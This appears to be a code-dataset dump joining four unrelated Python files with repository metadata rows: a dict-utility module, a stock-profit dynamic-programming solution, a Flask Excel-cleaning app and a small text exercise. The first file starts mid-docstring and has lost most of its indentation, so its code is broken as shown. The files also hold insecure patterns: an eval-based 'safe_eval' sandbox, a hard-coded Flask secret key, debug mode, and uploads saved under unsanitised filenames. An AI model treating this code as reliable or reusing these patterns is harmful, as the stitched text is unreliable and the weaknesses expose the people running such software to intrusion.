Map: A flattened object of same type as 'obj'.
.. warning::
Flattening will enforce all keys to be string-types!
`reducer` is a function accepted by the functools.reduce function, which is of
form: f(a, b) where _a_ is the accumulated value, and _b_ is the updated value
from the iterable.
The .items() function produces key-value tuple-pairs. These can be expanded
with *, e.g. `*("a", "b")` will expand to `"a", "b"`. This property is used
to expand the `kv_pair` below.
Example walkthrough on `flatten_dict({'a': 1, 'b': {'c': {'d': 2}}})`: ::
`outer` <- obj: {'a': 1, 'b': {'c': {'d': 2}}}, prefix: ''
`reducer` <- key: 'a', value: 1
`inner` <- acc: {}, key: 'a', value: 1, prefix: ''
`inner` -> {'a': 1}
`reducer` -> {'a': 1}
`reducer` <- key: 'b', value: {'c': {'d': 2}}
`inner` <- acc: {'a': 1}, key: 'b', value: {'c': {'d': 2}}, prefix: ''
`outer` <- obj: {'c': {'d': 2}}, prefix: 'b.'
`reducer` <- key: 'c', value: {'d': 2}
`inner` <- acc: {}, key: 'c', value: {'d': 2}, prefix: 'b.'
`outer` <- obj: {'d': 2}, prefix: 'b.c.'
`reducer` <- key: 'd', value: 2
`inner` <- acc: {}, key: 'd', value: 2, prefix: 'b.c.'
`inner` -> {'b.c.d': 2}
`reducer` -> {'b.c.d': 2}
`outer` -> {'b.c.d': 2}
`inner` -> {'b.c.d': 2}
`reducer` -> {'b.c.d': 2}
`outer` -> {'b.c.d': 2}
`inner` -> {'a': 1, 'b.c.d': 2}
`reducer` -> {'a': 1, 'b.c.d': 2}
`outer` -> {'a': 1, 'b.c.d': 2}
"""
if not isinstance(obj, Map):
raise TypeError("flatten_dict works only on dict-like types", type(obj))
_t = type(obj)
def outer(obj: Map, prefix: str) -> Map:
def reducer(accumulator: Map, kv_pair: t.Tuple):
return inner(accumulator, *kv_pair, prefix)
return reduce(reducer, obj.items(), _t())
def inner(accumulator: Map, key: str, value: t.Any, prefix: str) -> Map:
if isinstance(value, Map):
return _t(**accumulator, **outer(value, prefix + key + sep))
else:
return _t(**accumulator, **_t({prefix + key: value}))
return outer(obj, "")
def expand_dict(obj: Map, sep: str = ".") -> Map:
"""Expands a flattened mapping by splitting keys with the given separator
Args:
obj (Map): The flattened dict-like object to unflatten
sep (str, optional): The key separator
Raises:
TypeError: If wrong type is supplied
ValueError: If a non-flat dict is supplied
Returns:
Map: The expanded mapping object of same type as 'obj'.
Example:
>>> d = {'a': 1, 'b': 2, 'c.ca': 1, 'c.cb': 2}
>>> expand_dict(d)
{'a': 1, 'b': 2, 'c': {'ca': 1, 'cb': 2}}
"""
if not isinstance(obj, Map):
raise TypeError("expand_dict works only on dict-like types", type(obj))
if dict_depth(obj) != 1:
raise ValueError(
"expand_dict works only on flat dict-like types, "
"got a mapping of depth: {}".format(dict_depth(obj))
)
def inner(obj):
accumulator = type(obj)()
for k, v in obj.items():
*head, last = k.split(sep)
_ = accumulator
# Create missing paths
for part in head:
if part not in _:
_[part] = type(obj)()
_ = _[part]
_[last] = v
return accumulator
return inner(obj)
def get_concrete_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List:
"""Get a list of non-abstract subclasses of a type
Args:
klass (t.Type): The type object
recursive (bool): Should the classes be extracted recursively? Defaults to True.
derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True]
Returns:
t.List: A list of concrete subclasses of the type
"""
from exot.util.mixins import _SubclassTracker as __
if derived and hasattr(klass, __.concrete):
return list(getattr(klass, __.concrete))
subclasses = get_subclasses(klass, recursive=recursive)
return [k for k in subclasses if not isabstract(k)]
def get_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List:
"""Get a list of subclasses of a type
Args:
klass (t.Type): The type object
recursive (bool): Should the classes be extracted recursively? Defaults to True.
derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True]
Returns:
t.List: A list of concrete subclasses of the type
"""
from exot.util.mixins import _SubclassTracker as __
if not (hasattr(klass, "__subclasses__") or hasattr(klass, __.derived)):
raise TypeError(f"__subclasses__ or {__.derived} attribute missing", klass)
if derived:
return list(getattr(klass, __.derived))
subclasses = klass.__subclasses__()
def walker(k):
first, *rest = k
if len(rest):
walker(rest)
if first not in subclasses:
subclasses.append(first)
if hasattr(first, "__subclasses__"):
_ = first.__subclasses__()
if len(_):
walker(_)
if recursive:
walker(subclasses)
return subclasses
def get_valid_access_paths(
obj: Map,
_limit: int = 8192,
_leaf_only: bool = False,
_use_lists: bool = True,
_fallthrough_empty: bool = True,
) -> t.Generator[t.Tuple, None, None]:
"""Generate valid key sequences in a dict, optionally including lists
Args:
obj (Map): The dict-like object
_limit (int): Maximum number of paths that can be created with list-like elements.
_leaf_only (bool): Provide paths for only the leaves of the mapping. Defaults to True.
_use_lists (bool): Provide paths for list-like elements in the mapping. Defaults to True.
_fallthrough_empty (bool): Discard empty list- or dict-like elements? Defaults to True.
Details:
If `_leaf_only` is set, only paths to leaves will be produced, a leaf being a value
that is not a mapping (or list).
If `_use_lists` is set, lists will also be *recursively* checked for valid paths.
if `_fallthrough_empty` is set, an empty dict or list will yield an empty tuple,
rendering a parent path.
Returns:
t.Generator[t.Tuple,None,None]: A generator that yields the access paths (tuples).
Examples:
>>> # Only leaves:
>>> d = {'a1': {'a2': None}, 'b2': None}
>>> list(get_valid_access_paths(d, _leaf_only=True))
[('a1', 'a2'), ('b2',)]
>>> # All paths:
>>> list(get_valid_access_paths(d, _leaf_only=False))
[('a1',), ('a1', 'a2'), ('b2',)]
"""
def thrower(o: object, t: type, n: str) -> t.NoReturn:
if not isinstance(o, t):
raise TypeError(
f"get_valid_access_paths expected {t!r} for {n!r}, got: {type(o)!r}"
)
thrower(obj, Map, "obj")
thrower(_limit, int, "_limit")
thrower(_leaf_only, bool, "_leaf_only")
thrower(_use_lists, bool, "_use_lists")
thrower(_fallthrough_empty, bool, "_fallthrough_empty")
def inner(obj: t.Union[Map, t.List, t.Set]) -> t.Generator:
if _fallthrough_empty and not obj:
yield tuple()
# if obj is a mapping
if isinstance(obj, Map):
for k, v in obj.items():
# if the value in obj is also a mapping...
if isinstance(v, Map):
if not _leaf_only:
yield (k,)
# ... make a recursive call
for vv in inner(v):
yield (k,) + vv
# if the value in obj is a list...
elif _use_lists and isinstance(v, (t.List, t.Set)):
# ... first yield the valid path to the key containing the list
if v and not _leaf_only:
yield (k,)
elif not v and _fallthrough_empty:
yield (k,)
# ... loop through elements, and keep track of indexes
for idx, vv in enumerate(v):
# if an element is also a mapping or list...
if isinstance(vv, (Map, (t.List, t.Set))):
# ... make a recursive call
for vvv in inner(vv):
yield (k,) + (idx,) + vvv
else:
# ... otherwise yield keypath + idx
yield (k,) + (idx,)
# if the value is neither a mapping nor a list, yield the key
else:
yield (k,)
# if obj is a list-like sequence
if _use_lists and isinstance(obj, (t.List, t.Set)):
# might be tricky to generate valid sequences for large lists!
if _limit and len(obj) >= _limit:
raise ValueError(
f"get_key_sequences list limit of {_limit} exceeded: {len(obj)}"
)
for idx, v in enumerate(obj):
if isinstance(v, (Map, (t.List, t.Set))):
for vv in inner(v):
yield (idx,) + vv
else:
yield (idx,)
return inner(obj)
def getitem(obj: Map, query: t.Union[str, t.Tuple], *args: t.Any, sep: str = "/") -> t.Any:
"""Get a value from a dict-like object using an XPath-like query, or a tuple-path
Accesses an object that provides a dict-like interface using a query: either a
tuple representing the path, or a string where consecutive keys are separated with
a separator, e.g. "key1/key2".
Returns the value of the object at the given key-sequence. Returns a default value
if provided, or throws a LookupError.
Args:
obj (Map): a mapping
query (t.Union[str, t.Tuple]): a query path using a separated string or a tuple
*args (t.Any): an optional default value, similar to `getattr`
sep (str, optional): a separator string used to split a string query path
Returns:
t.Any: the value stored in obj for the given query, or the default value
Raises:
LookupError: if query not found and no default value is provided
TypeError: if obj is not a mapping, or query is not a str or tuple
"""
if not isinstance(obj, Map):
raise TypeError("'obj' must be an instance of Mapping, e.g. dict", type(obj))
if not isinstance(query, (str, t.Tuple)):
raise TypeError("'query' must be a str or a tuple", type(query))
if len(args) > 1:
raise TypeError(f"getitem accepts at most 3 positional args, got {len(args)}")
_obj = obj
# handler for tuple queries
if isinstance(query, t.Tuple):
_valid = get_valid_access_paths(obj)
if query not in _valid:
if args:
return args[0]
else:
raise LookupError(f"query {query!r} not found")
else:
for node in query:
_obj = _obj[node]
return _obj
# handler for string queries
else:
try:
# loop through components in the query, consecutively accessing the mapping
for node in query.split(sep):
# handle empty nodes in the query, e.g. when query="a///b" -> "a/b"
if not node:
continue
if isinstance(_obj, Map):
for k in _obj.keys():
node = type(k)(node) if str(k) == node else node
elif isinstance(_obj, (t.List, t.Set)):
try:
node = int(node)
except TypeError:
raise LookupError(
f"{node} not convertible to int when attempting to access "
f"a list {_obj!r}"
)
_obj = _obj[node]
return _obj
except LookupError as Error:
if args:
return args[0]
else:
Error.args += (query,)
raise
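# A minimal usage sketch of getitem showing an equivalent string query and
# tuple query against a small hypothetical mapping, plus a default value for
# a missing key. Illustrative only, not exported in __all__.
def _example_getitem() -> t.Tuple[t.Any, t.Any, t.Any]:
    obj = {"a": {"b": [10, 20]}}
    by_string = getitem(obj, "a/b/1")  # -> 20
    by_tuple = getitem(obj, ("a", "b", 1))  # -> 20
    with_default = getitem(obj, "a/missing", "fallback")  # -> "fallback"
    return by_string, by_tuple, with_default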
def has_method(klass: t.Union[type, object], name: str) -> bool:
"""Check if a method exists in any of a klass'es bases
Args:
klass (t.Union[type, object]): The type or object
name (str): The name of the method
Returns:
bool: True if has a method with the given name.
"""
candidates = find_attributes(klass, name)
if not candidates:
return False
def is_callable(c):
return isinstance(getattr(klass, str(c), None), t.Callable)
return all(is_callable(f) for f in candidates)
def has_property(klass: t.Union[type, object], name: str) -> bool:
"""Check if a variable exists in any of a klass'es bases
Args:
klass (t.Union[type, object]): The type or object
name (str): The name of the property
Returns:
bool: True if has a property with the given name.
"""
candidates = find_attributes(klass, name)
if not candidates:
return False
def is_property(c):
return not isinstance(getattr(klass, str(c), None), property)
return all(is_property(f) for f in candidates)
def has_type(klass: t.Union[type, object]) -> bool:
"""Check if a type or instance has a Type member type that derives from Enum
Args:
klass (t.Union[type, object]): The type or object
Returns:
bool: True if has the "Type" attribute.
"""
if not isinstance(klass, (type, object)):
raise TypeError(klass)
return issubclass(getattr(klass, "Type", type(None)), Enum)
def has_variable(klass: t.Union[type, object], name: str) -> bool:
"""Check if a variable exists in any of a klass'es bases
Args:
klass (t.Union[type, object]): The type or object
name (str): The name of the variable
Returns:
bool: True if has a variable with the given name.
"""
candidates = find_attributes(klass, name)
if not candidates:
return False
def is_not_callable(c):
return not isinstance(getattr(klass, str(c), None), t.Callable)
return all(is_not_callable(f) for f in candidates)
def is_abstract(klass: t.Union[type, object]) -> bool:
"""Check if a type or instance is abstract
Args:
klass (t.Union[type, object]): The type or object
Returns:
bool: True if the type/instance is abstract.
"""
if not isinstance(klass, (type, object)):
raise TypeError(klass)
if hasattr(klass, "__abstractmethods__"):
return 0 != len(getattr(klass, "__abstractmethods__"))
else:
from inspect import isabstract
return isabstract(klass)
def is_scalar_numeric(value: t.Any) -> bool:
"""Check if is an int, a float, or a NumPy variant thereof
Args:
value (t.Any): The value to inspect
Returns:
bool: True if scalar and numeric.
"""
return isinstance(value, (float, int, np.integer, np.floating))
def leaves(obj: Map) -> t.Generator:
"""Get leaves of a mapping
Args:
obj (Map): The dict-like object
Returns:
t.Generator: A generator that yields the leaf elements of the mapping.
"""
paths = get_valid_access_paths(obj, _leaf_only=True, _use_lists=False)
return (getitem(obj, path) for path in paths)
def list2cmdline(seq: t.Iterable) -> str:
"""Translates a sequence of arguments into a command line string with "None" removal
Args:
seq (t.Iterable): The sequence of arguments
Returns:
str: The command-line string
"""
seq = [_ for _ in seq if _ is not None]
return _list2cmdline(seq)
def map_to_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> t.Any:
"""Map a function to leaves of an object
A leaf is considered to be an object that is not a Mapping (or, when _seq is set,
also not a Sequence except a string, which is also a Sequence).
Args:
function (t.Callable[[t.Any], t.Any]): a function of signature "a -> a"
obj (t.T): a dict-like, list-like, or plain object
_seq (bool, optional): map on elements of lists?
Returns:
t.T: the obj with transformed elements
"""
def inner(obj: t.T) -> t.Any:
if isinstance(obj, Map):
return type(obj)({k: inner(v) for k, v in obj.items()})
elif _seq and isinstance(obj, (t.List, t.Set)):
return type(obj)(inner(v) for v in obj)
else:
return function(obj)
return inner(obj)
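# A minimal usage sketch of map_to_leaves: doubling every leaf of a hypothetical
# nested structure while preserving its shape. Illustrative only, not exported
# in __all__.
def _example_map_to_leaves() -> t.Dict:
    data = {"a": 1, "b": {"c": [2, 3]}}
    # -> {"a": 2, "b": {"c": [4, 6]}}
    return map_to_leaves(lambda x: 2 * x, data)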
def mro_getattr(cls: type, attr: str, *args: t.Any) -> t.Any:
"""Get an attribute from a type's class hierarchy
Args:
cls (type): The type
attr (str): The attribute
*args (t.Any): The default value (like in Python's default getattr)
Returns:
t.Any: The attribute, or when not found the default value (if provided)
Raises:
TypeError: Not called on a type
TypeError: Wrong number of arguments
AttributeError: Attribute not found and no default value provided
"""
if not isinstance(cls, type):
raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}")
if len(args) > 1:
raise TypeError(f"mro_getattr expected at most 3 arguments, got {2 + len(args)}")
for klass in cls.mro()[1:]:
if hasattr(klass, attr):
# return first matching attribute
return getattr(klass, attr)
if args:
# if provided, return args[0], i.e. the a default value
return args[0]
else:
raise AttributeError(f"type object {cls.__name__!r} has no attribute {attr!r}")
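# A minimal usage sketch of mro_getattr with two hypothetical classes: the
# lookup starts at the first base class, so an attribute defined on the base
# is found, and a missing attribute falls back to the provided default.
# Illustrative only, not exported in __all__.
def _example_mro_getattr() -> t.Tuple[t.Any, t.Any]:
    class _Base:
        marker = "base"

    class _Derived(_Base):
        pass

    found = mro_getattr(_Derived, "marker")  # -> "base"
    fallback = mro_getattr(_Derived, "missing", 42)  # -> 42
    return found, fallback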
def mro_hasattr(cls: type, attr: str) -> bool:
"""Check if an attribute exists in a type's class hierarchy
Args:
cls (type): The type
attr (str): The attribute
Returns:
bool: True if has the attribute.
Raises:
TypeError: Not called on a type
"""
if not isinstance(cls, type):
raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}")
for klass in cls.mro()[1:]:
if hasattr(klass, attr):
return True
return False
def random_string(length: int) -> str:
"""Make a random string of specified length
Args:
length (int): The desired random string length
Returns:
str: The random string
"""
assert isinstance(length, int), f"'length' must be an int, got: {type(length)}"
return "".join(random.choices(ascii_letters, k=length))
def timestamp() -> str:
"""Make a timestamp with current time
Returns:
str: The timestamp in ISO format
"""
return datetime.now().isoformat("_", timespec="seconds").replace(":", "-")
def safe_eval(
to_eval: str, *, expect: t.Tuple[type] = (list, np.ndarray), timeout: int = 10
) -> object:
"""Evaluate a restricted subset of Python (and numpy) from a string
Args:
to_eval (str): The string to evaluate
expect (t.Tuple[type]): The list of expected resulting types. Defaults to list, ndarray.
timeout (int): The timeout after which the call fails in seconds. Defaults to 10.
The `safe_eval` function allows using a subset of commands, listed in `_globals` and
`_locals`, which includes a few numpy functions: linspace, arange, array, rand, and
randint. Examples:
>>> safe_eval("linspace(1, 10, 10, dtype=int).tolist()")
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
>>> safe_eval("__import__('os').getcwd()")
NameError Traceback (most recent call last)
...
NameError: name '__import__' is not defined
>>> safe_eval("range(5)")
TypeError Traceback (most recent call last)
...
TypeError: eval produced a <class 'range'>, expected: (<class 'list'>, <class 'numpy.ndarray'>)
>>> safe_eval("list(round(rand(), 2) for _ in range(5))")
[0.96, 0.41, 0.9, 0.98, 0.02]
"""
assert isinstance(to_eval, str), "'to_eval' must be a str"
assert isinstance(expect, tuple), "'expect' must be a tuple"
assert all(isinstance(_, type) for _ in expect), "'expect' must contain only types"
_locals = {}
_globals = {
"__builtins__": {},
"list": list,
"range": range,
"len": len,
"int": int,
"float": float,
"min": min,
"max": max,
"round": round,
"linspace": np.linspace,
"geomspace": np.geomspace,
"logspace": np.logspace,
"hstack": np.hstack,
"vstack": np.vstack,
"split": np.split,
"arange": np.arange,
"array": np.array,
"rand": np.random.rand,
"randint": np.random.randint,
}
class AlarmException(Exception):
pass
def signal_handler(number: int, frame):
assert number == signal.SIGALRM.value
raise AlarmException()
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(timeout)
try:
_ = eval(to_eval, _globals, _locals)
except AlarmException:
raise TimeoutError(f"safe_eval took longer than {timeout} seconds")
else:
signal.signal(signal.SIGALRM, signal.SIG_IGN)
signal.alarm(0)
if not isinstance(_, expect):
raise EvalTypeError(f"eval produced a {type(_)}, expected: {expect}")
return _
def sanitise_ansi(value: t.Union[t.List[str], str]) -> t.Union[t.List[str], str]:
"""Remove all ANSI escape characters from a str or a list of str
Args:
value (t.Union[t.List[str], str]): The string or list of strings
Returns:
t.Union[t.List[str], str]: The sanitised string or a list of sanitised strings
"""
_ansi_escape = re.compile(r"(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]")
if isinstance(value, str):
return _ansi_escape.sub("", value)
elif isinstance(value, t.List):
return list(map(lambda x: _ansi_escape.sub("", x).strip(), value))
else:
raise TypeError("sanitise_ansi accepts only str or lists of str")
def setgetattr(klass: t.Union[type, object], attr: str, default: t.Any) -> None:
"""Combines `setattr` and `getattr` to set attributes
Args:
klass (t.Union[type, object]): The type or object
attr (str): The attribute
default (t.Any): The default value
"""
if not any([isinstance(klass, type), isinstance(klass, object)]):
raise TypeError("'klass' should be a type or an object", klass)
if not isinstance(attr, str):
raise TypeError("'attr' should be a str")
if not attr:
raise ValueError("'attr' should not be empty")
setattr(klass, attr, getattr(klass, attr, default))
def setitem(obj: t.MutableMapping, query: t.Tuple, value: t.Any, force: bool = False) -> None:
"""Set a value in a dict-like object using a tuple-path query
Args:
obj (t.MutableMapping): a mutable mapping
query (t.Tuple): a query path as a tuple
value (t.Any): value to set
Raises:
TypeError: if obj is not a mutable mapping
"""
if not isinstance(obj, t.MutableMapping):
raise TypeError("'obj' needs to be a mutable mapping", type(obj))
_obj = obj
_valid = get_valid_access_paths(obj)
if query not in _valid:
if not force:
raise KeyError(f"query-path {query!r} not found")
else:
for node in query[:-1]:
if node not in _obj:
_obj = dict()
_obj = _obj[node]
else:
for node in query[:-1]:
_obj = _obj[node]
_obj[query[-1]] = value
def stub_recursively(
obj: t.T, stub: t.Any = None, _stub_list_elements: bool = True
) -> t.Optional[t.T]:
"""Produce a copy with all leaf values recursively set to a 'stub' value
Args:
obj (t.T): the object to stub
stub (t.Any, optional): the value to set the leaf elements to
_stub_list_elements (bool, optional): stub individual elements in collections?
Returns:
(t.T, optional): the stubbed object
"""
def inner(obj):
if isinstance(obj, Map):
return type(obj)((k, inner(v)) for k, v in obj.items())
elif _stub_list_elements and isinstance(obj, (t.List, t.Set)):
return type(obj)(inner(v) for v in obj)
else:
return stub
return inner(obj)
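# A minimal usage sketch of stub_recursively on a hypothetical configuration
# tree, e.g. to produce an empty template with the same shape. Illustrative
# only, not exported in __all__.
def _example_stub_recursively() -> t.Optional[t.Dict]:
    config = {"host": "10.0.0.1", "ports": [80, 443], "auth": {"user": "x"}}
    # -> {"host": None, "ports": [None, None], "auth": {"user": None}}
    return stub_recursively(config)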
def unpack__all__(*imports: t.Collection[str]) -> t.Tuple[str]:
"""Upacks a list of lists/tuples into a 1-dimensional list
Args:
*imports (t.Collection[str]): The collections of strings in "__all__"
Returns:
t.Tuple[str]: The flattened imports as a tuple of strings.
"""
from itertools import chain
_name = f"{__name__}.unpack__all__"
if not all(isinstance(e, (t.List, t.Tuple)) for e in imports):
raise TypeError(f"{_name}: arguments should be lists or tuples")
_ = chain(*imports)
assert all(
issubclass(type(e), str) for e in _
), f"{_name}: values in unpacked containers were not scalar or 'str'"
return tuple(_)
def validate_helper(what: t.Mapping, key: t.Any, *types: type, msg: str = "") -> t.NoReturn:
"""Validate types of key in a mapping using key-paths
Args:
what (t.Mapping): The mapping
key (t.Any): The key
*types (type): The valid types
msg (str): An additional error message. Defaults to "".
"""
if not isinstance(what, t.Mapping):
raise TypeError(f"validate_helper works only on mappings, got {type(what)}")
if not types:
raise TypeError(f"validate helper expects at least 1 'types' argument")
if isinstance(key, str) or not isinstance(key, t.Iterable):
key = tuple([key])
elif not isinstance(key, tuple):
key = tuple(key)
# The `config` property setter guarantees that `config` is a fully
# mutated AttributeDict, therefore :meth:`getattr` can be used.
if not isinstance(getitem(what, key, None), types):
raise MisconfiguredError(
"{0}config key: '{1!s}' should be of type {2!r}, got {3!s}".format(
f"{msg} " if msg else "", key, types, type(getitem(what, key, None))
)
)
def get_cores_and_schedules(environments_apps_zones: t.Mapping) -> set:
e_a_z = environments_apps_zones
_cores_and_schedules = set()
for env in e_a_z:
for app in e_a_z[env]:
if app != "src":
continue
_path_to_cores = ("app_config", "generator", "cores")
_path_to_schedule_tag = ("zone_config", "schedule_tag")
access_paths = list(get_valid_access_paths(e_a_z[env][app]))
if _path_to_cores not in access_paths:
raise LayerMisconfigured(
f"{env!r}->{app!r} must have a 'generator.cores' config key"
)
if _path_to_schedule_tag not in access_paths:
_ = e_a_z[env][app]["zone"]
raise LayerMisconfigured(
f"{env!r}.{_!r} of app {app!r} must have a schedule_tag"
)
_cores_and_schedules.add(
(
len(getitem(e_a_z[env][app], _path_to_cores)),
getitem(e_a_z[env][app], _path_to_schedule_tag),
)
)
return _cores_and_schedules
| 33.755825 | 158 | 0.592601 | 45 | 0.001242 | 4,126 | 0.113915 | 0 | 0 | 0 | 0 | 20,444 | 0.56444 |
9ede197b4e22a537f288d32a4de554ea29c1ea06 | 1,222 | py | Python | 70_question/dynamic_programming/max_profit_with_k_transactions.py | alvinctk/google-tech-dev-guide | 9d7759bea1f44673c2de4f25a94b27368928a59f | [
"Apache-2.0"
]
| 26 | 2019-06-07T05:29:47.000Z | 2022-03-19T15:32:27.000Z | 70_question/dynamic_programming/max_profit_with_k_transactions.py | alvinctk/google-tech-dev-guide | 9d7759bea1f44673c2de4f25a94b27368928a59f | [
"Apache-2.0"
]
| null | null | null | 70_question/dynamic_programming/max_profit_with_k_transactions.py | alvinctk/google-tech-dev-guide | 9d7759bea1f44673c2de4f25a94b27368928a59f | [
"Apache-2.0"
]
| 6 | 2019-10-10T06:39:28.000Z | 2020-05-12T19:50:55.000Z | def maxProfitWithKTransactions(prices, k):
    n = len(prices)
    profit = [[0]*n for _ in range(k+1)]
    """
    t := number of transactions
    d := day at which either buy/sell stock
    profit[t][d] = max ( previous day profit = profit[t][d-1] ,
                         profit sold at this day + max(buy for this transaction + profit at last transaction)
                         prices[d] + max(-prices[x] + profit[t-1][x], where 0 <= x < d)
    """
    if not prices:
        return 0

    for t in range(1, k+1):
        for d in range(1, n):
            previous_day_profit = profit[t][d-1]
            max_profit_buy_on_t = float("-inf")
            for x in range(0, d):
                max_profit_buy_on_t = max(max_profit_buy_on_t, -prices[x] + profit[t-1][x])
            profit[t][d] = max(previous_day_profit, prices[d] + max_profit_buy_on_t)

    debug = False
    if debug:
        print(prices)
        for row in profit:
            print(row)

    print("Maximum profit for k={} transaction for {} stock prices at each day = {}".format(k, prices, profit[-1][-1] if profit else 0))
    return profit[-1][-1]


if __name__ == "__main__":
    maxProfitWithKTransactions([5, 11, 3, 50, 60, 90], 2)
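
# The recurrence written out inside maxProfitWithKTransactions can also be
# evaluated in O(n*k) time instead of O(n^2*k) by carrying a running maximum of
# (-prices[x] + profit[t-1][x]) across the days. The function below is an
# illustrative sketch of that idea (not part of the original file); for the same
# inputs it should return the same value as maxProfitWithKTransactions,
# e.g. 93 for prices=[5, 11, 3, 50, 60, 90] and k=2.
def maxProfitWithKTransactionsFast(prices, k):
    if not prices or k == 0:
        return 0
    n = len(prices)
    profit = [[0] * n for _ in range(k + 1)]
    for t in range(1, k + 1):
        # Best (-prices[x] + profit[t-1][x]) seen so far, i.e. the best buy
        # position for transaction t up to the current day.
        best_buy = -prices[0] + profit[t - 1][0]
        for d in range(1, n):
            profit[t][d] = max(profit[t][d - 1], prices[d] + best_buy)
            best_buy = max(best_buy, -prices[d] + profit[t - 1][d])
    return profit[-1][-1]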
| 31.333333 | 136 | 0.56383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 441 | 0.360884 |
9edf6ecb3d424f1fd6e8e155154f4ecebc700938 | 4,149 | py | Python | main.py | rdmaulana/flask-smart-xls-clean | 8dde5b56c241312ab252964b159921acd6013839 | [
"MIT"
]
| null | null | null | main.py | rdmaulana/flask-smart-xls-clean | 8dde5b56c241312ab252964b159921acd6013839 | [
"MIT"
]
| null | null | null | main.py | rdmaulana/flask-smart-xls-clean | 8dde5b56c241312ab252964b159921acd6013839 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import io
import time
import uuid
from flask import Flask, render_template, request, redirect, url_for, Response, session, send_file, make_response, send_from_directory
from os.path import join, dirname, realpath
from werkzeug.wsgi import FileWrapper
app = Flask(__name__)
app.config["DEBUG"] = True
app.config["UPLOAD_FOLDER"] = 'media/dataset'
app.config["EXPORT_FOLDER_CSV"] = 'media/result'
app.config["SECRET_KEY"] = 'DBA2823#*@$&bdaiuwgdbi8238XBxjzhx@$@'
app.config['SESSION_TYPE'] = 'filesystem'
@app.route('/')
def index():
return render_template('index.html')
@app.route("/", methods=['POST'])
def uploadExcel():
start_id = request.form['id']
uploaded_file = request.files['file']
if uploaded_file.filename != '':
file_path = join(app.config['UPLOAD_FOLDER'], uploaded_file.filename)
uploaded_file.save(file_path)
cleanExcel(file_path, start_id)
csv_name = session['csv_name']
return redirect(url_for('success', file_id=csv_name))
else:
return redirect(url_for('index'))
@app.route('/export/<file_id>', methods=['GET','POST'])
def success(file_id):
filename = session['csv_name'] if "csv_name" in session else ""
return render_template('success.html', filename=file_id)
@app.route('/downloads/<path:filename>', methods=['GET','POST'])
def download(filename):
uploads = join(app.root_path, app.config['EXPORT_FOLDER_CSV'])
return send_from_directory(directory=uploads, filename=filename)
def cleanExcel(file_path, start_id):
xls = pd.read_excel(file_path)
xls = xls.replace(to_replace=[r"\\t|\\n|\\r", "\t|\n|\r"], value=["",""], regex=True)
print("Jumlah awal: {}".format(xls.shape))
xls.rename(columns = {
'NIK':'nik',
'NAMA':'nama',
'JENIS_KELAMIN':'jkel',
'TANGGAL_LAHIR':'tgl_lahir',
'NO_HP':'telp',
'INSTANSI_PEKERJAAN':'instansi',
'ALAMAT KTP': 'alamat',
'ALAMAT_KTP': 'alamat',
'KODE_KAB_KOTA_TEMPAT_KERJA': 'kab_id',
'KODE_KATEGORI': 'kategori'
}, inplace = True)
xls['nik'] = xls['nik'].astype(str)
xls.insert(0, 'id', range(int(start_id), int(start_id) + len(xls)))
xls.insert(2, 'nama_ktp', xls['nama'])
xls.insert(6, 'status', 0)
# del xls['NO']
del xls['UMUR']
del xls['JENIS_PEKERJAAN']
xls.drop(xls[xls['tgl_lahir'].isnull()].index, inplace = True)
xls.drop(xls[xls['nik'].isnull()].index, inplace = True)
xls.drop(xls[xls['nik'].str.len() > 16].index, inplace = True)
xls.drop(xls[xls['nik'].str.len() < 16].index, inplace = True)
xls.drop(xls[xls.duplicated(['nik'])].index, inplace = True)
if xls['tgl_lahir'].dtypes == 'object':
xls['tgl_lahir'] = pd.to_datetime(xls['tgl_lahir'])
if xls['telp'].dtypes == 'float64':
xls['telp'] = xls['telp'].astype(str)
xls['telp'] = xls['telp'].str.split('.').str[0]
xls['telp'] = xls['telp'].replace('nan',np.NaN)
xls['telp'] = '0' + xls['telp']
if xls['telp'].dtypes == 'object':
xls['telp'] = xls['telp'].str.split('/').str[0]
xls['telp'] = xls['telp'].str.replace('\+62','0')
xls['telp'] = xls['telp'].str.replace(' ','')
xls['telp'] = xls['telp'].str.replace('-','')
if xls['kab_id'].dtypes == 'float64':
xls['kab_id'] = xls['kab_id'].astype(str)
xls['kab_id'] = xls['kab_id'].str.split('.').str[0]
xls['kab_id'] = xls['kab_id'].replace('nan',np.NaN)
if xls['kategori'].dtypes == 'int64':
xls['kategori'] = xls['kategori'].astype(str)
xls['kategori'] = xls['kategori'].apply(lambda x: '0' + x if len(x) == 1 else x)
xls['alamat'] = xls['alamat'].replace(';','')
print("Jumlah akhir: {}".format(xls.shape))
uid = str(uuid.uuid4())[:4]
path_file = 'media/result/'
outfile_name = '{0}{1}'.format(time.strftime("%Y%m%d-%H%M%S-"),uid)
session['csv_name'] = f'{outfile_name}'
xls.to_csv(f'{path_file}{outfile_name}.csv', index=False, header=True, encoding="utf-8")
if __name__ == '__main__':
app.run(debug=True) | 35.161017 | 134 | 0.612919 | 0 | 0 | 0 | 0 | 976 | 0.235237 | 0 | 0 | 1,198 | 0.288744 |
9edfa90d3388411fff4970296751427f8a1b76b6 | 257 | py | Python | 2_UNIXCommands/Exercise11.py | takeyoshinitta/NLP-100-Exercise | e77fb385fbbf50c8a8bdc47442db1421739ea5b6 | [
"MIT"
]
| 3 | 2022-01-04T19:02:22.000Z | 2022-02-21T08:52:18.000Z | 2_UNIXCommands/Exercise11.py | takeyoshinitta/NLP-100-Exercise | e77fb385fbbf50c8a8bdc47442db1421739ea5b6 | [
"MIT"
]
| null | null | null | 2_UNIXCommands/Exercise11.py | takeyoshinitta/NLP-100-Exercise | e77fb385fbbf50c8a8bdc47442db1421739ea5b6 | [
"MIT"
]
| null | null | null | # 11. Replace tabs into spaces
# Replace every occurrence of a tab character into a space. Confirm the result by using sed, tr, or expand command.
with open('popular-names.txt') as f:
for line in f:
print(line.strip().replace("\t", " "))
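# Equivalent shell checks (illustrative; the input file name is the same
# popular-names.txt assumed above):
#   sed 's/\t/ /g' popular-names.txt
#   tr '\t' ' ' < popular-names.txt
#   expand -t 1 popular-names.txt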
